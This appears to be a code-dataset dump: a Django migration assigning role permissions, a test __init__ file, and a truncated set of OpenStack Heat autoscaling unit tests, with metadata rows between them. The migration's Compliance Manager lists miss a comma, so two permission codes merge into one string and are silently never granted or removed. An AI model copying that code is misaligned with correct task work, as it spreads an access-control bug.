2021-03-01T16:41:32.000Z
|
backend/api/migrations/0188_update_roles_permissions.py
|
amichard/tfrs
|
ed3973016cc5c2ae48999d550a23b41a5ddad807
|
[
"Apache-2.0"
] | 1,167
|
2017-03-04T00:18:43.000Z
|
2022-03-03T22:31:51.000Z
|
backend/api/migrations/0188_update_roles_permissions.py
|
amichard/tfrs
|
ed3973016cc5c2ae48999d550a23b41a5ddad807
|
[
"Apache-2.0"
] | 48
|
2017-03-09T17:19:39.000Z
|
2022-02-24T16:38:17.000Z
|
from django.db import migrations
from django.db.migrations import RunPython
def add_permissions(apps, schema_editor):
"""
Adds the missing permissions from certain roles
"""
db_alias = schema_editor.connection.alias
permission_model = apps.get_model(
'api', 'Permission')
role_model = apps.get_model('api', 'Role')
role_permission = apps.get_model('api', 'RolePermission')
# Compliance Reporting
permissions = permission_model.objects.using(db_alias).filter(code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW",
"CREDIT_CALCULATION_VIEW"
])
role_permissions = []
for permission in permissions:
role_permissions.append(
role_permission(
role=role_model.objects.using(db_alias).get(
name="ComplianceReporting"
),
permission=permission
)
)
role_permission.objects.using(db_alias).bulk_create(role_permissions)
# Signing Authority
permissions = permission_model.objects.using(db_alias).filter(code__in=[
"EDIT_FUEL_SUPPLIER", "VIEW_COMPLIANCE_REPORT"
])
role_permissions = []
for permission in permissions:
role_permissions.append(
role_permission(
role=role_model.objects.using(db_alias).get(
name="FSManager"
),
permission=permission
)
)
role_permission.objects.using(db_alias).bulk_create(role_permissions)
# File Submission
permissions = permission_model.objects.using(db_alias).filter(code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW"
])
role_permissions = []
for permission in permissions:
role_permissions.append(
role_permission(
role=role_model.objects.using(db_alias).get(
name="FSDocSubmit"
),
permission=permission
)
)
role_permission.objects.using(db_alias).bulk_create(role_permissions)
# File Submission (Government)
permissions = permission_model.objects.using(db_alias).filter(code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "EDIT_PRIVILEGED_COMMENTS",
"DOCUMENTS_LINK_TO_CREDIT_TRADE", "USE_HISTORICAL_DATA_ENTRY",
"VIEW_FUEL_SUPPLIERS", "VIEW_PRIVILEGED_COMMENTS",
"VIEW_APPROVED_CREDIT_TRANSFERS"
])
role_permissions = []
for permission in permissions:
role_permissions.append(
role_permission(
role=role_model.objects.using(db_alias).get(
name="GovDoc"
),
permission=permission
)
)
role_permission.objects.using(db_alias).bulk_create(role_permissions)
# Administrator
permissions = permission_model.objects.using(db_alias).filter(code__in=[
"EDIT_PRIVILEGED_COMMENTS", "EDIT_FUEL_SUPPLIER",
"VIEW_PRIVILEGED_COMMENTS"
])
role_permissions = []
for permission in permissions:
role_permissions.append(
role_permission(
role=role_model.objects.using(db_alias).get(
name="Admin"
),
permission=permission
)
)
role_permission.objects.using(db_alias).bulk_create(role_permissions)
# Director / Deputy Director
roles = role_model.objects.using(db_alias).filter(name__in=[
"GovDeputyDirector", "GovDirector"
])
role_permissions = []
for role in roles:
role_permissions.append(
role_permission(
role=role,
permission=permission_model.objects.using(db_alias).get(
code="DOCUMENTS_VIEW"
)
)
)
role_permission.objects.using(db_alias).bulk_create(role_permissions)
# Compliance Manager
permissions = permission_model.objects.using(db_alias).filter(code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "ADD_COMMENT", "FUEL_CODES_VIEW",
"PROPOSE_CREDIT_TRANSFER", "CREDIT_CALCULATION_MANAGE",
"FUEL_CODES_MANAGE", "EDIT_PRIVILEGED_COMMENTS",
"DOCUMENTS_LINK_TO_CREDIT_TRADE", "EDIT_FUEL_SUPPLIERS",
"RECOMMEND_CREDIT_TRANSFER", "RESCIND_CREDIT_TRANSFER",
"DOCUMENTS_GOVERNMENT_REVIEW", "USE_HISTORICAL_DATA_ENTRY",
"CREDIT_CALCULATION_VIEW", "DOCUMENTS_VIEW", "VIEW_FUEL_SUPPLIERS"
"VIEW_PRIVILEGED_COMMENTS", "VIEW_APPROVED_CREDIT_TRANSFERS"
])
role_permissions = []
for permission in permissions:
role_permissions.append(
role_permission(
role=role_model.objects.using(db_alias).get(
name="GovComplianceManager"
),
permission=permission
)
)
role_permission.objects.using(db_alias).bulk_create(role_permissions)
def remove_permissions(apps, schema_editor):
"""
Removes the permissions that were added
"""
db_alias = schema_editor.connection.alias
role_permission = apps.get_model('api', 'RolePermission')
# Compliance Reporting
role_permission.objects.using(db_alias).filter(
permission__code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW",
"CREDIT_CALCULATION_VIEW"
],
role__name="ComplianceReporting"
).delete()
# Signing Authority
role_permission.objects.using(db_alias).filter(
permission__code__in=[
"EDIT_FUEL_SUPPLIER", "VIEW_COMPLIANCE_REPORT"
],
role__name="FSManager"
).delete()
# File Submission
role_permission.objects.using(db_alias).filter(
permission__code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "FUEL_CODES_VIEW"
],
role__name="FSDocSubmit"
).delete()
# File Submission (Government)
role_permission.objects.using(db_alias).filter(
permission__code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "EDIT_PRIVILEGED_COMMENTS",
"DOCUMENTS_LINK_TO_CREDIT_TRADE", "USE_HISTORICAL_DATA_ENTRY",
"VIEW_FUEL_SUPPLIERS", "VIEW_PRIVILEGED_COMMENTS",
"VIEW_APPROVED_CREDIT_TRANSFERS"
],
role__name="GovDoc"
).delete()
# Administrator
role_permission.objects.using(db_alias).filter(
permission__code__in=[
"EDIT_PRIVILEGED_COMMENTS", "EDIT_FUEL_SUPPLIER",
"VIEW_PRIVILEGED_COMMENTS"
],
role__name="Admin"
).delete()
# Director / Deputy Director
role_permission.objects.using(db_alias).filter(
permission__code="DOCUMENTS_VIEW",
role__name__in=["GovDeputyDirector", "GovDirector"]
).delete()
# Compliance Manager
role_permission.objects.using(db_alias).filter(
permission__code__in=[
"LOGIN", "VIEW_CREDIT_TRANSFERS", "ADD_COMMENT", "FUEL_CODES_VIEW",
"PROPOSE_CREDIT_TRANSFER", "CREDIT_CALCULATION_MANAGE",
"FUEL_CODES_MANAGE", "EDIT_PRIVILEGED_COMMENTS",
"DOCUMENTS_LINK_TO_CREDIT_TRADE", "EDIT_FUEL_SUPPLIERS",
"RECOMMEND_CREDIT_TRANSFER", "RESCIND_CREDIT_TRANSFER",
"DOCUMENTS_GOVERNMENT_REVIEW", "USE_HISTORICAL_DATA_ENTRY",
"CREDIT_CALCULATION_VIEW", "DOCUMENTS_VIEW", "VIEW_FUEL_SUPPLIERS"
"VIEW_PRIVILEGED_COMMENTS", "VIEW_APPROVED_CREDIT_TRANSFERS"
],
role__name="GovComplianceManager"
).delete()
class Migration(migrations.Migration):
"""
Attaches the functions for the migrations
"""
dependencies = [
('api', '0187_auto_20190923_1556'),
]
operations = [
RunPython(
add_permissions,
remove_permissions
)
]
| 31.258964
| 79
| 0.639052
| 763
| 7,846
| 6.14941
| 0.129751
| 0.044757
| 0.083546
| 0.113384
| 0.804135
| 0.79561
| 0.765985
| 0.75682
| 0.75682
| 0.704604
| 0
| 0.00278
| 0.266505
| 7,846
| 250
| 80
| 31.384
| 0.812511
| 0.053276
| 0
| 0.715847
| 0
| 0
| 0.255394
| 0.16298
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010929
| false
| 0
| 0.010929
| 0
| 0.038251
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5f00a2b9bc15c70be8ac9e7ef2935adf7f5ab1fb
| 83
|
py
|
Python
|
test/__init__.py
|
coco673/TrustyBrowser
|
e88f09c0e7899d53eac266f9c83d2f8949303e0f
|
[
"Beerware"
] | null | null | null |
test/__init__.py
|
coco673/TrustyBrowser
|
e88f09c0e7899d53eac266f9c83d2f8949303e0f
|
[
"Beerware"
] | null | null | null |
test/__init__.py
|
coco673/TrustyBrowser
|
e88f09c0e7899d53eac266f9c83d2f8949303e0f
|
[
"Beerware"
] | null | null | null |
from .test_Reports import *
from .test_SSLTester import *
from .test_Test import *
| 20.75
| 29
| 0.783133
| 12
| 83
| 5.166667
| 0.416667
| 0.387097
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144578
| 83
| 3
| 30
| 27.666667
| 0.873239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5f3588af809e515ad843b69579083301e16da950
| 74,744
|
py
|
Python
|
heat/tests/test_autoscaling.py
|
redhat-openstack/heat
|
6b9be0a868b857e942c1cc90594d0f3a0d0725d0
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
redhat-openstack/heat
|
6b9be0a868b857e942c1cc90594d0f3a0d0725d0
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
redhat-openstack/heat
|
6b9be0a868b857e942c1cc90594d0f3a0d0725d0
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import mock
import mox
from oslo.config import cfg
from oslo.utils import timeutils
import six
from heat.common import exception
from heat.common import short_id
from heat.common import template_format
from heat.engine.notification import autoscaling as notification
from heat.engine import parser
from heat.engine import resource
from heat.engine.resources import autoscaling as asc
from heat.engine.resources import instance
from heat.engine.resources import loadbalancer
from heat.engine.resources.neutron import loadbalancer as neutron_lb
from heat.engine import rsrc_defn
from heat.engine import scheduler
from heat.tests.common import HeatTestCase
from heat.tests import utils
as_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "AutoScaling Test",
"Parameters" : {
"ImageId": {"Type": "String"},
"KeyName": {"Type": "String"}
},
"Resources" : {
"WebServerGroup" : {
"Type" : "AWS::AutoScaling::AutoScalingGroup",
"Properties" : {
"AvailabilityZones" : ["nova"],
"LaunchConfigurationName" : { "Ref" : "LaunchConfig" },
"MinSize" : "1",
"MaxSize" : "5",
"LoadBalancerNames" : [ { "Ref" : "ElasticLoadBalancer" } ]
}
},
"WebServerScaleUpPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "1"
}
},
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"ElasticLoadBalancer" : {
"Type" : "AWS::ElasticLoadBalancing::LoadBalancer",
"Properties" : {
"AvailabilityZones" : ["nova"],
"Listeners" : [ {
"LoadBalancerPort" : "80",
"InstancePort" : "80",
"Protocol" : "HTTP"
}]
}
},
"LaunchConfig" : {
"Type" : "AWS::AutoScaling::LaunchConfiguration",
"Properties": {
"ImageId" : {"Ref": "ImageId"},
"InstanceType" : "bar",
"BlockDeviceMappings": [
{
"DeviceName": "vdb",
"Ebs": {"SnapshotId": "9ef5496e-7426-446a-bbc8-01f84d9c9972",
"DeleteOnTermination": "True"}
}]
}
}
}
}
'''
as_template_bad_group = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Parameters" : {
"ImageId": {"Type": "String"},
"KeyName": {"Type": "String"}
},
"Resources" : {
"WebServerScaleUpPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : "not a real group",
"Cooldown" : "60",
"ScalingAdjustment" : "1"
}
}
}
}
'''
class AutoScalingTest(HeatTestCase):
dummy_instance_id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
params = {'KeyName': 'test', 'ImageId': 'foo'}
def setUp(self):
super(AutoScalingTest, self).setUp()
cfg.CONF.set_default('heat_waitcondition_server_url',
'http://server.test:8000/v1/waitcondition')
self.stub_keystoneclient()
def create_scaling_group(self, t, stack, resource_name):
# create the launch configuration resource
conf = stack['LaunchConfig']
self.assertIsNone(conf.validate())
scheduler.TaskRunner(conf.create)()
self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
# check bdm in configuration
self.assertIsNotNone(conf.properties['BlockDeviceMappings'])
# create the group resource
rsrc = stack[resource_name]
self.assertIsNone(rsrc.validate())
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
# check bdm in instance_definition
instance_definition = rsrc._get_instance_definition()
self.assertIn('BlockDeviceMappings',
instance_definition['Properties'])
return rsrc
def create_scaling_policy(self, t, stack, resource_name):
rsrc = stack[resource_name]
self.assertIsNone(rsrc.validate())
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
return rsrc
def _stub_create(self, num, with_error=None):
self.m.StubOutWithMock(instance.Instance, 'handle_create')
self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
self.stub_ImageConstraint_validate()
if with_error:
instance.Instance.handle_create().AndRaise(
exception.Error(with_error))
return
cookie = object()
for x in range(num):
instance.Instance.handle_create().AndReturn(cookie)
instance.Instance.check_create_complete(cookie).AndReturn(False)
instance.Instance.check_create_complete(
cookie).MultipleTimes().AndReturn(True)
def _stub_delete(self, num):
self.m.StubOutWithMock(instance.Instance, 'handle_delete')
self.m.StubOutWithMock(instance.Instance, 'check_delete_complete')
task = object()
for x in range(num):
instance.Instance.handle_delete().AndReturn(task)
instance.Instance.check_delete_complete(task).AndReturn(False)
instance.Instance.check_delete_complete(
task).MultipleTimes().AndReturn(True)
def _stub_suspend(self, cookies=None, with_error=None):
cookies = cookies or []
self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
if with_error:
instance.Instance.handle_suspend().AndRaise(
exception.Error(with_error))
return
inst_cookies = cookies or [(object(), object(), object())]
for cookie in inst_cookies:
instance.Instance.handle_suspend().InAnyOrder().AndReturn(cookie)
instance.Instance.check_suspend_complete(
cookie).InAnyOrder().AndReturn(False)
instance.Instance.check_suspend_complete(
cookie).InAnyOrder().AndReturn(True)
def _stub_resume(self, cookies=None, with_error=None):
cookies = cookies or []
self.m.StubOutWithMock(instance.Instance, 'handle_resume')
self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
if with_error:
instance.Instance.handle_resume().AndRaise(
exception.Error(with_error))
return
inst_cookies = cookies or [(object(), object(), object())]
for cookie in inst_cookies:
instance.Instance.handle_resume().InAnyOrder().AndReturn(cookie)
instance.Instance.check_resume_complete(
cookie).InAnyOrder().AndReturn(False)
instance.Instance.check_resume_complete(
cookie).InAnyOrder().AndReturn(True)
def _stub_lb_reload(self, num, unset=True, nochange=False):
expected_list = [self.dummy_instance_id] * num
if unset:
self.m.VerifyAll()
self.m.UnsetStubs()
if num > 0:
self.m.StubOutWithMock(instance.Instance, 'FnGetRefId')
instance.Instance.FnGetRefId().MultipleTimes().AndReturn(
self.dummy_instance_id)
if not nochange:
self.m.StubOutWithMock(loadbalancer.LoadBalancer, 'handle_update')
loadbalancer.LoadBalancer.handle_update(
mox.IgnoreArg(), mox.IgnoreArg(),
{'Instances': expected_list}).AndReturn(None)
def _stub_scale_notification(self,
adjust,
groupname,
start_capacity,
adjust_type='ChangeInCapacity',
end_capacity=None,
with_error=None):
self.m.StubOutWithMock(notification, 'send')
notification.send(stack=mox.IgnoreArg(),
adjustment=adjust,
adjustment_type=adjust_type,
capacity=start_capacity,
groupname=mox.IgnoreArg(),
suffix='start',
message="Start resizing the group %s"
% groupname,
).AndReturn(False)
if with_error:
notification.send(stack=mox.IgnoreArg(),
adjustment=adjust,
capacity=start_capacity,
adjustment_type=adjust_type,
groupname=mox.IgnoreArg(),
message='Nested stack update failed:'
' Error: %s' % with_error,
suffix='error',
).AndReturn(False)
else:
notification.send(stack=mox.IgnoreArg(),
adjustment=adjust,
adjustment_type=adjust_type,
capacity=end_capacity,
groupname=mox.IgnoreArg(),
message="End resizing the group %s"
% groupname,
suffix='end',
).AndReturn(False)
def _stub_meta_expected(self, now, data=None, nsignal=1):
# Stop time at now
timeutils.set_time_override(now)
self.addCleanup(timeutils.clear_time_override)
# Then set a stub to ensure the metadata updates are as expected.
self.m.StubOutWithMock(resource.Resource, 'metadata_set')
# Set scaling_in_progress=True at the beginning of a scaling operation.
# This does not happen on create.
init_expected = mox.ContainsKeyValue('scaling_in_progress', True)
# Note for ScalingPolicy, we expect to get a metadata
# update for the policy and autoscaling group, so pass nsignal=2 in
# that case
for x in range(nsignal):
resource.Resource.metadata_set(init_expected).AndReturn(None)
# Set scaling_in_progress=False and the cooldown timestamp at the end
# of a scaling operation. This occurs on both create and scale events.
if data is None:
cooldown = mox.IgnoreArg()
else:
cooldown = {now.isoformat(): data}
expected = {'cooldown': cooldown,
'scaling_in_progress': False}
# Note for ScalingPolicy, we expect to get a metadata
# update for the policy and autoscaling group, so pass nsignal=2
# Creating an autoscaling group also performs a metadata write, so
# expect 1 write when nsignal=0
for x in range(nsignal or 1):
resource.Resource.metadata_set(expected).AndReturn(None)
def test_scaling_delete_empty(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '0'
properties['MaxSize'] = '0'
properties['DesiredCapacity'] = '0'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(0)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertIsNone(rsrc.FnGetAtt("InstanceList"))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_adjust_down_empty(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '1'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
instance_names = rsrc.get_instance_names()
self.assertEqual(1, len(instance_names))
# Reduce the min size to 0, should complete without adjusting
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_meta_expected(now)
self.m.ReplayAll()
props = copy.copy(rsrc.properties.data)
props['MinSize'] = '0'
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(instance_names, rsrc.get_instance_names())
# trigger adjustment to reduce to 0, there should be no more instances
self._stub_lb_reload(0)
self._stub_scale_notification(adjust=-1, groupname=rsrc.FnGetRefId(),
start_capacity=1, end_capacity=0)
self._stub_meta_expected(now, 'ChangeInCapacity : -1')
self._stub_delete(1)
self.m.ReplayAll()
rsrc.adjust(-1)
self.assertEqual([], rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_replace(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(1, len(rsrc.get_instance_names()))
props = copy.copy(rsrc.properties.data)
props['AvailabilityZones'] = ['foo']
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
updater = scheduler.TaskRunner(rsrc.update, update_snippet)
self.assertRaises(resource.UpdateReplace, updater)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(1, len(rsrc.get_instance_names()))
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_suspend()
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.suspend)()
self.assertEqual((rsrc.SUSPEND, rsrc.COMPLETE), rsrc.state)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(1, len(rsrc.get_instance_names()))
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_resume()
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
scheduler.TaskRunner(rsrc.resume)()
self.assertEqual((rsrc.RESUME, rsrc.COMPLETE), rsrc.state)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend_multiple(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(2, len(rsrc.get_instance_names()))
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_suspend(cookies=[('foo1', 'foo2', 'foo3'),
('bar1', 'bar2', 'bar3')])
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.suspend)()
self.assertEqual((rsrc.SUSPEND, rsrc.COMPLETE), rsrc.state)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume_multiple(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(2, len(rsrc.get_instance_names()))
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_resume(cookies=[('foo1', 'foo2', 'foo3'),
('bar1', 'bar2', 'bar3')])
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
scheduler.TaskRunner(rsrc.resume)()
self.assertEqual((rsrc.RESUME, rsrc.COMPLETE), rsrc.state)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend_fail(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(1, len(rsrc.get_instance_names()))
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_suspend(with_error='oops')
self.m.ReplayAll()
sus_task = scheduler.TaskRunner(rsrc.suspend)
self.assertRaises(exception.ResourceFailure, sus_task, ())
self.assertEqual((rsrc.SUSPEND, rsrc.FAILED), rsrc.state)
self.assertEqual('Error: Resource SUSPEND failed: Error: oops',
rsrc.status_reason)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume_fail(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(1, len(rsrc.get_instance_names()))
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_resume(with_error='oops')
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
sus_task = scheduler.TaskRunner(rsrc.resume)
self.assertRaises(exception.ResourceFailure, sus_task, ())
self.assertEqual((rsrc.RESUME, rsrc.FAILED), rsrc.state)
self.assertEqual('Error: Resource RESUME failed: Error: oops',
rsrc.status_reason)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_create_error(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self.m.StubOutWithMock(instance.Instance, 'handle_create')
self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
instance.Instance.handle_create().AndRaise(Exception)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
conf = stack['LaunchConfig']
self.assertIsNone(conf.validate())
scheduler.TaskRunner(conf.create)()
self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
rsrc = stack['WebServerGroup']
self.assertIsNone(rsrc.validate())
self.assertRaises(exception.ResourceFailure,
scheduler.TaskRunner(rsrc.create))
self.assertEqual((rsrc.CREATE, rsrc.FAILED), rsrc.state)
self.assertEqual([], rsrc.get_instance_names())
self.m.VerifyAll()
def test_scaling_group_update_ok_maxsize(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(1, len(rsrc.get_instance_names()))
instance_names = rsrc.get_instance_names()
self.m.VerifyAll()
self.m.UnsetStubs()
# Reduce the max size to 2, should complete without adjusting
self._stub_meta_expected(now)
self.m.ReplayAll()
props = copy.copy(rsrc.properties.data)
props['MaxSize'] = '2'
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(instance_names, rsrc.get_instance_names())
self.assertEqual(2, rsrc.properties['MaxSize'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_minsize(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(1, len(rsrc.get_instance_names()))
# Increase min size to 2, should trigger an ExactCapacity adjust
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
props = copy.copy(rsrc.properties.data)
props['MinSize'] = '2'
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(2, len(rsrc.get_instance_names()))
self.assertEqual(2, rsrc.properties['MinSize'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_desired(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
